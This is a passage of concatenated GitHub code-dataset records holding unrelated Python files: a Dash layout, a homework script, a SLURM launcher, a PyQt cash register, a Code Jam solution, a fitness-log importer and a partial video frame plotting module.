dbc.Card(\n id=\"description\",\n children=[\n dbc.CardHeader(\"Data Attribution and Usage\"),\n dbc.CardBody([dcc.Markdown(intro)]),\n ],\n ),\n ],\n)\n\nstore_matches = dcc.Store(id=\"player_matches\")\nstore_info = dcc.Store(id=\"player_info\")\n\ntabs = dbc.Row(\n [\n dcc.Tabs(\n id=\"tabs\",\n value=\"summary\",\n children=[\n make_tab(label=\"Player Summary\", value=\"summary\"),\n make_tab(label=\"Serve & Return\", value=\"serve_return\"),\n make_tab(label=\"Under Pressure\", value=\"under_pressure\"),\n make_tab(\n label=\"H2H\",\n value=\"h2h\",\n ),\n ],\n colors={\n \"border\": \"white\",\n \"primary\": \"gold\",\n \"background\": \"cornsilk\",\n },\n ),\n ],\n)\n\n\npage = html.Div(\n [\n attribution,\n store_matches,\n store_info,\n get_filter_rows(players),\n tabs,\n dbc.Row(id=\"tab-content\", style={\"margin-left\": \"1.5%\", \"margin-right\": \"1.5%\"}),\n ]\n)\n","repo_name":"FBruzzesi/atp_stats_webapp","sub_path":"webapp/layout/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"1514743217","text":"def remove_vowels(input_string):\n vowels = \"aeiouyAEIOUY\"\n result = \"\"\n for char in input_string:\n if char not in vowels:\n result += char\n return result\n\n\ninput_str = \"My name is Hlib! But you can call me Bread.\"\nresult = remove_vowels(input_str)\nprint(\"Original string:\", input_str)\nprint(\"String with vowels removed:\", result)\n","repo_name":"HKalininQA/hillel_HW","sub_path":"hw6/hw6_7.py","file_name":"hw6_7.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17153561248","text":"import os\nimport numpy as np\n\n# Get number of running and pending jobs\ncmd = \"squeue -u bibeauv -h -t pending,running -r | wc -l\"\nrunning_jobs = int(os.popen(cmd).read())\n\n# Get last mixer being launched\nwith open('last_mixer.txt', 'r') as f:\n last_job = f.readlines()\n\n# Mixers to launch\nmax_jobs = 1000\nfirst_mixer = int(last_job[0])+1\nlast_mixer = (max_jobs - running_jobs) + first_mixer-1\n\nthis_path = os.getcwd() + '/..'\nfor mixer in np.linspace(first_mixer, last_mixer, (last_mixer-first_mixer)+1, dtype=int):\n geo_path = this_path + '/mixer_' + str(mixer)\n os.chdir(geo_path)\n\n os.system('cp ../launch_lethe.py .')\n os.system('cp ../launch_lethe.sh .')\n os.system('sbatch -J ' + 'mixer_' + str(mixer) + ' launch_lethe.sh')\n\nos.chdir('../utils')\n\n# Change first and last mixer being launched\nwith open('last_mixer.txt', 'w') as f:\n f.write(str(last_mixer))\n\nwith open('first_mixer.txt', 'w') as f:\n f.write(str(first_mixer))\n","repo_name":"lethe-cfd/mixing-ann","sub_path":"sim100k/utils/launch_auto_job.py","file_name":"launch_auto_job.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"19812483738","text":"from PyQt5.QtWidgets import QTableWidgetItem, QMessageBox\nfrom GUI.ui_GUI import Ui_Sistema\nfrom PyQt5.QtCore import QDateTime\nfrom DataBase.DataBase import DataBase\n\nfrom Funcoes.genericas import caminho_db, mascara_dinheiro, remover_masc_dinheiro\n\nfrom Funcoes.poupup import Poup, Erro\n\n\nclass Caixa(Ui_Sistema):\n\n def __init__(self, ui, dados): \n #inicia as variaveis basicas\n self.db = DataBase(caminho_db())\n self.gasolina = self.db.valor_combustivel(\"Gasolina Comum\")\n\n self.dados_usuario = dados\n self.ui = ui\n\n #Insere informações na tela\n self.ui.cb_bomba.currentIndexChanged.connect(lambda: self.redefinir_campo_leitura_anterior())\n self.atualizar_tela()\n self.preencher_nome()\n\n #Ação dos botões\n self.ui.btn_cx_inserir.clicked.connect(lambda: self.calculo_caixa())\n self.ui.btn_cx_inserir.setAutoDefault(True)\n self.ui.btn_cx_fechar.clicked.connect(lambda: self.inserir_dados())\n self.ui.btn_cx_fechar.setAutoDefault(True)\n\n\n self.ui.ln_cx_din.editingFinished.connect(lambda: self.definir_campo_troco())\n self.ui.ln_cx_pix.editingFinished.connect(lambda: self.definir_campo_troco())\n self.ui.ln_cx_cartao.editingFinished.connect(lambda: self.definir_campo_troco())\n\n def atualizar_tela(self):\n self.limpar_dados()\n self.inserir_informacoes_tela()\n self.inserir_info_cb_bombas()\n\n\n def limpar_dados(self):\n self.dados = {\n 'codigo' : 0,\n 'digital_anterior': '',\n 'analogico_anterior': '',\n 'valor_gasolina' : self.gasolina,\n }\n self.dados_fechamento_caixa = {\n 'data' : '',\n 'bomba' : '',\n 'funcionario' : '',\n 'digital_anterior': '',\n 'analogico_anterior': '',\n 'digital_atual' : '',\n 'analogico_atual' : '',\n 'litros' : '',\n 'valor' : '',\n 'dinheiro_caixa' : '',\n 'pix' : '',\n 'cartao' : '',\n 'total' : '',\n 'resto' : '',\n 'retiradas' : {},\n }\n self.dados_retiradas = {}\n\n self.dados_vendas = {}\n\n def inserir_informacoes_tela(self):\n self.ui.cx_nome.setCurrentText(self.dados_usuario['nome'])\n self.ui.cx_data.setDateTime(QDateTime.currentDateTime())\n\n def redefinir_campo_leitura_anterior(self):\n self.consultar_leitura_anterior()\n self.ui.ln_ana_anterior.setText(str(self.dados['analogico_anterior']))\n self.ui.ln_digi_anterior.setText(str(self.dados['digital_anterior']))\n\n def consultar_leitura_anterior(self):\n dados = self.db.select_caixa_anterior(self.ui.cb_bomba.currentText())\n leitura_anterior = dados[0]\n self.dados['codigo'] = dados[1]\n if leitura_anterior[0] > 1000.000:\n anterior = leitura_anterior[0] - 1000\n else: anterior = leitura_anterior[0]\n self.dados['digital_anterior'] = self.converter_string_para_float(\"{:.3f}\".format(anterior)) \n self.dados['analogico_anterior'] = self.converter_string_para_float(leitura_anterior[1]) \n\n def calculo_caixa(self):\n campos_vazios = False\n campos_vazios = self.receber_dados_leitura_fechamento()\n\n if campos_vazios == False:\n self.receber_dados_leitura_anterior()\n\n analogico = (self.dados_fechamento_caixa['analogico_atual'] - self.dados_fechamento_caixa['analogico_anterior']) * 1000\n digital = self.dados_fechamento_caixa['digital_atual'] - self.dados_fechamento_caixa['digital_anterior']\n\n self.dados_fechamento_caixa['litros'] = float(\"{:.2f}\".format((analogico + (digital)) / 2))\n\n self.dados_fechamento_caixa['valor'] = self.converter_string_para_float(\"{:.2f}\".format(self.dados_fechamento_caixa['litros'] * self.dados['valor_gasolina']))\n\n self.inserir_valores_finais()\n else:\n Erro(\"Preencha todos os campos corretamente.\", QMessageBox.Warning)\n\n def calculo_tanque(self, litros):\n DataBase(caminho_db()).querry_generica(\"UPDATE Valor_combustivel SET quantidade = quantidade - {} WHERE combustivel = 'Gasolina Comum'\".format(litros))\n\n def inserir_valores_finais(self):\n self.ui.ln_cx_litros.setText(f\"{self.dados_fechamento_caixa['litros']}\")\n self.ui.ln_cx_valor.setText(f\"{self.dados_fechamento_caixa['valor']}\")\n \n campos = [self.ui.ln_cx_din, self.ui.ln_cx_pix, self.ui.ln_cx_cartao]\n for campo in campos:\n campo.setText(\"0.0\")\n\n def receber_dados_leitura_fechamento(self):\n try:\n self.dados_fechamento_caixa['analogico_atual'] = self.converter_string_para_float(self.ui.ln_ana_atual.text())\n self.dados_fechamento_caixa['digital_atual'] = self.converter_string_para_float(self.ui.ln_digi_atual.text())\n return False\n except ValueError:\n return True\n\n def receber_dados_leitura_anterior(self):\n self.dados_fechamento_caixa['analogico_anterior'] = self.dados['analogico_anterior']\n self.dados_fechamento_caixa['digital_anterior'] = self.dados['digital_anterior']\n\n def definir_campo_troco(self):\n try: \n self.dados_fechamento_caixa['dinheiro_caixa'] = self.converter_string_para_float(self.ui.ln_cx_din.text())\n self.dados_fechamento_caixa['pix'] = self.converter_string_para_float(self.ui.ln_cx_pix.text())\n self.dados_fechamento_caixa['cartao'] = self.converter_string_para_float(self.ui.ln_cx_cartao.text())\n \n try:\n self.dados_fechamento_caixa['total'] = self.dados_fechamento_caixa['dinheiro_caixa'] + self.dados_fechamento_caixa['pix'] + self.dados_fechamento_caixa['cartao']\n self.dados_fechamento_caixa['resto'] = self.dados_fechamento_caixa['total'] - self.dados_fechamento_caixa['valor']\n self.ui.ln_cx_resto_2.setText((f\"{self.dados_fechamento_caixa['total']:.2f}\"))\n self.ui.ln_cx_resto.setText((f\"{self.dados_fechamento_caixa['resto']:.2f}\"))\n except ValueError or TypeError:\n Erro(\"Valor inválido.\", QMessageBox.Warning)\n self.ui.ln_cx_din.setText(\"0\")\n self.ui.ln_cx_pix.setText(\"0\")\n self.ui.ln_cx_cartao.setText(\"0\")\n self.ui.ln_cx_resto_2.setText(\"0\")\n\n except ValueError:\n Erro(\"Preencha os campos corretamente.\", QMessageBox.Warning, \"Erro\")\n\n def converter_string_para_float(self, num):\n try:\n n = num\n n = n.replace(\",\", \".\")\n return float(n)\n except AttributeError:\n return float(n)\n\n def preencher_nome(self):\n nomes = self.db.querry_generica('SELECT DISTINCT funcionario FROM Caixa')\n for nome in nomes:\n self.ui.cx_nome.addItem(nome[0])\n\n def calcular_total_retiradas(self):\n total = 0\n if self.dados_retiradas.values() != {}:\n for dado in self.dados_retiradas.values():\n total += remover_masc_dinheiro(dado['valor'])\n total = total\n return total\n\n def inserir_dados(self):\n if self.dados_retiradas != {}:\n self.dados_fechamento_caixa['retiradas'] = {\n 'codigo' : self.dados['codigo'],\n 'total' : self.calcular_total_retiradas(),\n 'retiradas' : self.dados_retiradas\n }\n else:\n self.dados_fechamento_caixa['retiradas'] = {'total' : 0}\n\n self.dados_fechamento_caixa['data'] = self.ui.cx_data.date().toString('yyyy-MM-dd')\n self.dados_fechamento_caixa['bomba'] = self.ui.cb_bomba.currentText()\n self.dados_fechamento_caixa['funcionario'] = self.ui.cx_nome.currentText()\n\n vazio = self.verifica_campos_vazios(self.dados_fechamento_caixa)\n\n if vazio == False:\n campos_vazios = Poup.confirma(\"Deseja completar o fechamento de caixa?\", QMessageBox.Warning)\n\n if campos_vazios == True:\n self.db.inserir_caixa(self.dados_fechamento_caixa)\n self.inserir_conta()\n self.calculo_tanque(self.dados_fechamento_caixa['litros'])\n #self.db.close_db()\n self.limpar_campos_caixa()\n self.ui.stackedWidget_2.setCurrentIndex(0)\n \n else:\n Erro(\"Preencha todos os campos corretamente.\", QMessageBox.Warning)\n\n def inserir_conta(self):\n self.db.querry_generica(\"UPDATE Contas SET valor = valor + {} WHERE conta = 'Caixa Posto'\".format(self.dados_fechamento_caixa[\"dinheiro_caixa\"]))\n if self.dados_fechamento_caixa[\"pix\"] != 0 or self.dados_fechamento_caixa[\"cartao\"] != 0:\n self.db.querry_generica(\"UPDATE Contas SET valor = valor + {} WHERE conta = 'Conta Inter'\".format(self.dados_fechamento_caixa[\"pix\"] + self.dados_fechamento_caixa[\"cartao\"]))\n\n def limpar_campos_caixa(self):\n self.ui.ln_digi_anterior.setText(\"\")\n self.ui.ln_digi_atual.setText(\"\")\n self.ui.ln_ana_anterior.setText(\"\")\n self.ui.ln_ana_atual.setText(\"\")\n self.ui.ln_cx_litros.setText(\"\")\n self.ui.ln_cx_valor.setText(\"\")\n self.ui.ln_cx_din.setText(\"\")\n self.ui.ln_cx_pix.setText(\"\")\n self.ui.ln_cx_cartao.setText(\"\")\n self.ui.ln_cx_resto_2.setText(\"\")\n self.ui.ln_cx_resto.setText(\"\")\n\n def verifica_campos_vazios(self, dados):\n for i in dados.values():\n if i == '':\n return True \n return False\n\n def inserir_info_cb_bombas(self):\n dados = self.db.consulta_bombas()\n self.ui.cb_bomba.clear()\n #self.ui.cb_bomba.addItem(\"\")\n for i in dados:\n self.ui.cb_bomba.addItem(str(i[0]))\n\n \nclass Vendas(Caixa):\n pass","repo_name":"GsFerreira99/Sistema-Posto","sub_path":"Funcoes/caixa.py","file_name":"caixa.py","file_ext":"py","file_size_in_byte":9870,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23447058471","text":"# ?\r\n\r\n#file_in = \"B-sample.in\"\r\n#file_out = \"B-sample.out\"\r\nfile_in = \"B-small-attempt1.in\"\r\nfile_out = \"B-small-attempt1.out\"\r\n#file_in = \"B-large.in\"\r\n#file_out = \"B-large.out\"\r\n\r\n#import math\r\n\r\n# Solves the problem\r\ndef Solve(N, A):\r\n SA = sorted(A)\r\n \r\n f = []\r\n b = []\r\n\r\n count = 0\r\n for a in SA:\r\n i = A.index(a)\r\n cf = 0\r\n cb = 0\r\n if 0 == i or N - 1 == i:\r\n continue\r\n for j in range(0, i):\r\n if A[j] > a:\r\n cf = cf + 1\r\n for j in range(i + 1, N):\r\n if A[j] > a:\r\n cb = cb + 1\r\n count = count + min(cf, cb)\r\n return count\r\n\r\n\r\n\r\n# Reads the input data and runs the test cases\r\ndef Run():\r\n fin = open(file_in, 'r')\r\n fout = open(file_out, 'w')\r\n\r\n lines = []\r\n for l in fin:\r\n lines.append(l)\r\n\r\n i = 0\r\n T = int(lines[0])\r\n i = i + 1\r\n \r\n for tc in range(0, T):\r\n N = int(lines[i].rstrip())\r\n i = i + 1\r\n As = lines[i].rstrip().split(' ')\r\n i = i + 1\r\n A = []\r\n for j in xrange(0, N):\r\n A.append(int(As[j]))\r\n result = str(Solve(N, A))\r\n fout.write(\"Case #\" + str(tc + 1) + \": \" + result + '\\n')\r\n fin.close()\r\n fout.close()\r\n \r\n\r\ndef main():\r\n Run()\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_149/115.py","file_name":"115.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14580250754","text":"#!/usr/bin/env python\nfrom notes import google_sheets\nimport json\nfrom pprint import pprint\nfrom datetime import datetime\n\ndef convert_to_date(timestamp):\n return str(datetime.utcfromtimestamp(int(timestamp)/1000).strftime('%m/%d/%Y'))\n\n\ndef convert_to_lbs(kgs):\n # rounds results to .5 lb granularity (matches plate sizes)\n return round((kgs*2.20462)*2)/2\n\n\ndef filter_exercise(exercise):\n return 'V-Bar' not in exercise and \\\n 'Chinup' not in exercise and \\\n 'Dumbbell' not in exercise and \\\n 'Incline' not in exercise and \\\n 'Curl' not in exercise and \\\n 'Pushup' not in exercise and \\\n 'Pulldown' not in exercise\n\n\nprograms = {}\n\nwith open('E:\\\\Dropbox\\\\projects\\\\fitness\\\\progression_backup\\\\up.json', 'r') as prgms:\n program_data = json.load(prgms)\n for program in program_data:\n programs[program['id']] = {'name': program['name'], 'activities': {}}\n for day in program['days']:\n for activity in day['activities']:\n programs[program['id']]['activities'][activity['id']] = activity['name']\n\nexercises_to_append = []\n\nwith open('E:\\\\Dropbox\\\\projects\\\\fitness\\\\progression_backup\\\\fws.json', 'r') as logs:\n logs_data = json.load(logs)\n for entry in logs_data:\n date = convert_to_date(entry['startTime'])\n try:\n program = programs[entry['programId']]['name']\n except KeyError:\n program = 'None'\n for activity in entry['activities']:\n exercise = activity['name']\\\n .replace('Barbell ', '')\\\n .replace('Shoulder', 'Overhead')\\\n .replace('Chinup', 'Chinup Negative')\\\n .replace('Machine ', '')\\\n .replace('Bent-Over', 'Barbell')\n sets = []\n for _set in activity['performance']['completedSets']:\n sets.append((_set['reps'], convert_to_lbs(_set['weight'])))\n if filter_exercise(exercise) and program is not 'None':\n # print(f\"{date} | {program} | {exercise} | {max(sets)}\")\n exercises_to_append.append([date, exercise, max(sets)[1], max(sets)[0]])\n\n# grab a list of known workouts in a google sheet\nsheets_connection = google_sheets.Sheets()\nfor entry in exercises_to_append:\n print(entry)\n sheets_connection.append_list_to_table(\n '1-vRxFamZOI_doMbcfVIpoEGaeDFvVM6OBWg0QM9YbBw',\n 'Connor-Historical',\n 'A2:D',\n entry)\n","repo_name":"chisaipete/flow","sub_path":"process_progression.py","file_name":"process_progression.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4496965992","text":"import os\nimport tempfile\nfrom subprocess import check_output\nimport matplotlib\nimport shutil\nimport copy\nimport multiprocessing\nimport math\nimport skimage.draw\n\nmatplotlib.use('Agg') # need to be executed before pyplot import, deactivates showing of plot in ipython\nimport matplotlib.pyplot as plt\nimport matplotlib.patheffects\nimport matplotlib.colors\n\nimport numpy as np\nfrom PIL import Image\n\nfrom . import config\nfrom . import utils\nfrom . import api\n\nframe_path_cacher = utils.FileSystemCache(max_cache_size=2048, cache_dir=config.cache_directory)\n\ndef adjust_cropping_window(xs, ys, scale, keepaspect=True, padding=600):\n xs, ys = (xs * scale).astype(np.int), (ys * scale).astype(np.int)\n padding *= scale\n\n width, height = int(config.width * scale), int(config.height * scale)\n\n left, top, right, bottom = xs.min()-padding, ys.min()-padding,\\\n xs.max()+padding, ys.max()+padding\n \n if keepaspect:\n aspect = width / height\n w, h = right - left, bottom - top\n diff = w - h * aspect\n if diff == 0:\n pass\n if diff < 0:\n left, right = left - abs(diff)//2, right + abs(diff)//2\n if min(width - right, left) < 0:\n diff = abs(left) if left < 0 else width - right\n left, right = left + diff, right + diff\n elif diff > 0:\n diff = abs(diff) / aspect\n top, bottom = top - diff // 2, bottom + diff // 2\n if min(height - bottom, top) < 0:\n diff = abs(top) if top < 0 else height - bottom\n top, bottom = top + diff, bottom + diff\n\n left, top, right, bottom = [x + x % 2 for x in (left, top, right, bottom)] # make numbers even for ffmpeg\n left, top, right, bottom = max(left, 0), max(top, 0), min(right, width), min(bottom, height)\n return left, top, right, bottom\n\n\ndef extract_single_frame(frame, scale, format=\"jpg\"):\n \"\"\"\n Extracts the image belonging to a `Frame`-object.\n Args:\n frame (Frame): The frame which should be extracted.\n\n Returns:\n An utils.ReusableBytesIO object containing the image.\n\n \"\"\"\n cache_key = (frame.frame_id, scale, format)\n if cache_key not in frame_path_cacher:\n try:\n with tempfile.NamedTemporaryFile(suffix=\".\"+format) as tmpfile:\n\n cmd = config.ffmpeg_extract_single_frame.format(\n video_path=frame.fc.video_path,\n frame_index=frame.index,\n output_path=tmpfile.name,\n scale=scale\n )\n print('executing: ', cmd)\n output = check_output(cmd, shell=True)\n print('output:', output)\n\n frame_path_cacher.put(cache_key, tmpfile.name)\n except FileNotFoundError:\n # The temporary file has been moved to the cache and can not be deleted.\n pass\n buf = frame_path_cacher.get_image_buffer(cache_key)\n return buf\n\ndef extract_frames(framecontainer, scale, format=\"jpg\", return_frame_id=None, begin_frame_id=None, number_of_frames=None):\n \"\"\"\n Extracts all frame-images of the corresponding video file of a FrameContainer.\n Optionally, extracts /number_of_frames/ frames starting by the frame with /begin_frame_id/.\n\n Args:\n framecontainer (FrameContainer): The FrameContainer which represents the video file from which the frames\n should be extracted\n return_frame_id: If not None, only the image buffer corresponding to the given frame_id will the returned.\n\n Returns:\n Dictionary with a mapping of Frame.id to utils.ReusableBytesIO object containing the frame.\n\n \"\"\"\n # Required frames.\n # Subset of the resulting filenames of the ffmpeg command.\n frame_set = framecontainer.frame_set\n\n # Check if all frames are already in the cache.\n images, cache_keys = None, None\n if begin_frame_id is None:\n # Fetch all frames belonging to that video.\n cache_keys = [(frame.frame_id, scale, format) for frame in frame_set.all()]\n else:\n # Figure out which index to start at and then get N frames.\n begin_frame_index = None\n for frame in frame_set.all():\n if frame.frame_id == begin_frame_id:\n begin_frame_index = frame.index\n break\n if begin_frame_index is None:\n raise ValueError(\"begin_frame_id is not contained in the frame container.\")\n # And add this subset to expected results.\n cache_keys, images = [], []\n for frame in frame_set.all():\n if frame.index < begin_frame_index or frame.index >= begin_frame_index + number_of_frames:\n continue\n cache_keys.append((frame.frame_id, scale, format))\n images.append('{:04}.{}'.format(frame.index - begin_frame_index, format))\n \n cache_miss = False\n for key in cache_keys:\n if key not in frame_path_cacher:\n cache_miss = True\n break\n\n if cache_miss:\n # Extract all frames via ffmpeg.\n if images is None:\n images = ['{:04}.{}'.format(x, format) for x in frame_set.values_list('index', flat=True)]\n\n with tempfile.TemporaryDirectory() as tmpdir:\n\n cmd = None\n if begin_frame_id is None:\n cmd = config.ffmpeg_extract_all_frames.format(\n video_path=framecontainer.video_path, output_path=tmpdir, scale=scale,\n file_format=format)\n else:\n cmd = config.ffmpeg_extract_n_frames.format(\n video_path=framecontainer.video_path, output_path=tmpdir, scale=scale,\n file_format=format, first_frame_index=begin_frame_index, number_of_frames=number_of_frames)\n print('executing: ', cmd)\n output = check_output(cmd, shell=True)\n print('output:', output)\n \n for idx in range(len(cache_keys)):\n frame_path_cacher.put(cache_keys[idx], os.path.join(tmpdir, images[idx]))\n \n results = dict()\n for (frame_id, scale, format) in cache_keys:\n if return_frame_id is None or frame_id == return_frame_id:\n results[frame_id] = frame_path_cacher.get_image_buffer((frame_id, scale, format))\n assert results[frame_id] is not None\n return results\n\n\ndef extract_video(frames):\n \"\"\"\n Extracts a number of frames and makes a video.\n Args:\n frames (list:Frame): list of frames\n\n Returns:\n The video as a utils.ReusableBytesIO object.\n \"\"\"\n with tempfile.TemporaryDirectory() as tmpdir:\n\n for i, frame in enumerate(frames):\n buffer = frame.get_image(extract='all')\n output_path = os.path.join(tmpdir, f'{i:04}.jpg')\n with open(output_path, \"wb\") as file:\n shutil.copyfileobj(buffer, file)\n\n with tempfile.NamedTemporaryFile(suffix=\".mp4\") as tmpfile:\n\n cmd = config.ffmpeg_frames_to_video.format(\n input_path=f'{tmpdir}/%04d.jpg',\n output_path=tmpfile.name,\n framerate=3\n )\n print('executing: ', cmd)\n check_output(cmd, shell=True)\n \n with open(tmpfile.name, \"rb\") as file:\n output = utils.ReusableBytesIO(file.read())\n output.seek(0)\n return output\n\ndef rotate_direction_vec(rotation, scale):\n x, y = 0, 5 / scale\n sined = np.sin(rotation)\n cosined = np.cos(rotation)\n normed_x = x*cosined - y*sined\n normed_y = x*sined + y*cosined\n return np.around(normed_x, decimals=2), np.around(normed_y, decimals=2)\n\n\nclass FramePlotter(api.FramePlotter):\n\n # Internal attributes.\n _xs_scaled = None\n _ys_scaled = None\n _cam_id = None\n _timestamp = None\n\n def __init__(self, **args):\n super(FramePlotter, self).__init__(**args)\n\n if self._colors is not None:\n if type(self._colors) is list:\n self._colors = np.array(self._colors)\n if self._colors.ndim == 1:\n self._colors = self._colors.reshape(-1, 1)\n if self._labels is not None:\n self._labels = np.array(self._labels)\n\n # Wrap the internal properties in case they require post-processing.\n\n @property\n def xs(self):\n if not self._xs:\n return None\n if self._xs_scaled is None:\n self._xs_scaled = (np.array(self._xs) * self.scale).astype(np.int)\n return self._xs_scaled\n @property\n def ys(self):\n if not self._ys:\n return None\n if self._ys_scaled is None:\n self._ys_scaled = (np.array(self._ys) * self.scale).astype(np.int)\n return self._ys_scaled\n @property\n def xs_unscaled(self):\n return self._xs\n @property\n def ys_unscaled(self):\n return self._ys\n @property\n def angles(self):\n return self._angles\n @property\n def sizes(self):\n return self._sizes\n @property\n def colors(self):\n if type(self._colors) is str or type(self._colors) is tuple:\n N = self.xs.shape[0]\n self._colors = np.array([self._colors] * N).reshape(N, 1)\n elif self._colors is None:\n N = self.xs.shape[0]\n self._colors = np.array([\"yellow\"] * N).reshape(N, 1)\n return self._colors\n @property\n def labels(self):\n return self._labels\n @property\n def title(self):\n return self._title\n @property\n def frame_id(self):\n return self._frame_id\n @property\n def scale(self):\n return self._scale if self._scale else 0.5\n @property\n def crop_coordinates(self):\n if self._crop_coordinates is None:\n return self._crop_coordinates\n return list((np.array(self._crop_coordinates) * self.scale).astype(np.int))\n @property\n def crop_mode(self):\n return self._crop_mode or \"shift\"\n @property\n def width(self):\n return int(config.width * self.scale)\n @property\n def height(self):\n return int(config.height* self.scale)\n @property\n def path_alpha(self):\n return self._path_alpha or 0.25\n @property\n def decode_all_frames(self):\n return not not self._decode_all_frames\n @property\n def decode_n_frames(self):\n return self._decode_n_frames\n @property\n def no_rotate(self):\n return not not self._no_rotate\n\n def requested_file_format(self):\n \"\"\"\n The file format to be returned by ffmpeg.\n \"\"\"\n return \"jpg\" if not self._raw else \"bmp\"\n\n def is_plotting_required(self):\n \"\"\"\n Whether matplotlib has to be used to prepare the image.\n \"\"\"\n return not self._raw\n\n def prepare_plotting(self, frame_obj):\n \"\"\"\n Required to be called prior to plotting. Fetches\n certain information from the database so that a forked\n process does not need to access the database objects or\n the connection.\n\n Args:\n frame_obj: models.Frame object\n \"\"\"\n self._timestamp = frame_obj.timestamp\n self._cam_id = frame_obj.cam_id\n\n def calculate_origin(self, frame_obj):\n \n import datetime\n assert self._cam_id >= 0 and self._cam_id <= 3\n year = datetime.datetime.utcfromtimestamp(self._timestamp).year\n return api.get_image_origin(self._cam_id, year)\n\n def plot(self, buffer, frame_obj=None):\n \"\"\"\n\n Args:\n buffer: file-like object containing the image\n\n Returns:\n utils.ReusableBytesIO object containing the final image\n \"\"\"\n if frame_obj is not None:\n self.prepare_plotting(frame_obj)\n else:\n if self._cam_id is None:\n raise ValueError(\"FramePlotter.plot called without frame_obj and without having called prepare_plotting beforehand.\")\n\n outputbuffer = None\n format = self.requested_file_format().upper()\n image = plt.imread(buffer, format=format)\n image = np.swapaxes(image, 0, 1)\n \n # To be able to specify a size independent of the resolution.\n if self.crop_coordinates: # Note that X and Y are swapped.\n x, y, x2, y2 = self.crop_coordinates\n width = abs(y2 - y)\n height = abs(x2 - x)\n else:\n width = image.shape[1]\n height = image.shape[0]\n width_factor = 1.0 / (width / config.height)\n\n is_plotting_required = self.is_plotting_required()\n\n if is_plotting_required:\n fig, ax = plt.subplots()\n dpi = fig.get_dpi()\n fig.set_size_inches(width/dpi, height/dpi)\n fig.subplots_adjust(left=0, right=1, bottom=0, top=1) # removes white margin\n \n ax.imshow(image)\n ax.axis('off')\n else:\n image = image[:, :, 0]\n \n # The actual plotting.\n if is_plotting_required:\n if self.xs is not None and self.ys is not None:\n # Draw arrows if rotation is given.\n if self.angles is not None:\n rotations = np.array([rotate_direction_vec(rot, self.scale) for rot in self.angles]) * 10.0\n ax.quiver(self.ys, self.xs, rotations[:, 1], rotations[:, 0], scale=0.45 / self.scale, color=self.colors, units='xy', alpha=0.5)\n \n for unique_color in np.unique(self.colors, axis=0):\n idx = np.all(self.colors == unique_color, axis=1).flatten()\n if unique_color.shape[0] == 1:\n unique_color = unique_color[0]\n # Draw scatterplot if radius is given.\n if self.sizes is not None:\n radius = np.array(self.sizes)\n # The size is meant to be in pixels of the original video.\n # A radius of around 25 pixels would be a tag.\n size = 2.0 * float(radius[idx][0])\n # Calcluate area, adjusted for scaling factor.\n size = (size * self.scale) ** 2.0\n ax.scatter(self.ys[idx], self.xs[idx], facecolors='none', edgecolors=unique_color, marker=\"o\",\n s=size, linewidth=max(3, 6 * self.scale * width / config.width) * self.scale, alpha=0.5)\n # Draw marker labels if given.\n if self.labels is not None:\n for i, label_i in enumerate(self.labels[idx]):\n if label_i is None or not label_i:\n continue\n ax.text(self.ys[idx][i], self.xs[idx][i], label_i, color=unique_color, fontsize=int(72 / width_factor), alpha=0.5)\n if self._paths is not None:\n for label, (distance, path) in self._paths.items():\n path = np.array(path) * self.scale\n color = \"k\"\n try:\n label_idx = np.argwhere(self.labels == label)[0][0]\n color = self.colors[label_idx]\n except:\n pass\n # Plot the path in segments to allow fading alpha.\n # Use bigger steps for better performance.\n last_end = path.shape[0]\n stepsize = 10 if last_end > 20 else 4\n steps = list(reversed(range(0, last_end, stepsize)))\n alpha = 1.0 - 0.1 * np.arange(len(steps))\n alpha[alpha < 0.1] = 0.1\n alpha *= self.path_alpha\n \n for step_i, step in enumerate(steps):\n ax.plot(path[step:last_end,1], path[step:last_end,0], color=color, linewidth=max(3, 10 * width / config.width) * self.scale, alpha=alpha[step_i])\n last_end = step + 1\n if self.title is not None:\n txt = plt.text(0.1, 0.9, self.title, size=int(108 / width_factor), color='white', transform=ax.transAxes, horizontalalignment='left')\n txt.set_path_effects([matplotlib.patheffects.withStroke(linewidth=5, foreground='k')])\n else:\n # No fancy plotting required - RAW mode.\n # We still provide basic circle functionality.\n if self.xs is not None and self.ys is not None:\n image.setflags(write=1)\n for (_x, _y, _r, _c) in zip (self.xs, self.ys, self.sizes, self.colors):\n rr, cc = skimage.draw.circle(_x, _y, self.scale * _r, shape=image.shape)\n color = matplotlib.colors.to_rgba(_c)\n # Assume the provided color is some sort of gray.\n image[rr, cc] = color[0] * 255\n if self.crop_coordinates is not None:\n x, y, x2, y2 = self.crop_coordinates\n # Make sure the width/height is divisible by two.\n # This is required by some codecs.\n if (x2 - x) % 2 == 1:\n x2 += 1\n if (y2 - y) % 2 == 1:\n y2 += 1\n w, h = x2 - x, y2 - y\n # Make sure the window stops at the screen border.\n keep_image_sizes = self.crop_mode == \"shift\"\n if x < 0:\n if keep_image_sizes:\n x2 -= x - 0\n x = 0\n if x2 > image.shape[0] - 1:\n if keep_image_sizes:\n x -= x2 - (image.shape[0] - 1)\n x2 = image.shape[0] - 1\n if y < 0:\n if keep_image_sizes:\n y2 -= y - 0\n y = 0\n if y2 > image.shape[1] - 1:\n if keep_image_sizes:\n y -= y2 - (image.shape[1] - 1)\n y2 = image.shape[1] - 1\n if is_plotting_required:\n ax.set_xlim((y, y2))\n ax.set_ylim((x, x2))\n else:\n image = image[x:x2, y:y2]\n if keep_image_sizes:\n assert (x2 - x) == w\n assert (y2 - y) == h\n elif is_plotting_required:\n # Make sure that the plot is cropped at the image's bounds.\n ax.set_xlim((0, image.shape[1]))\n ax.set_ylim((0, image.shape[0]))\n # Make sure that the image's origin is the same as in the original video.\n if not 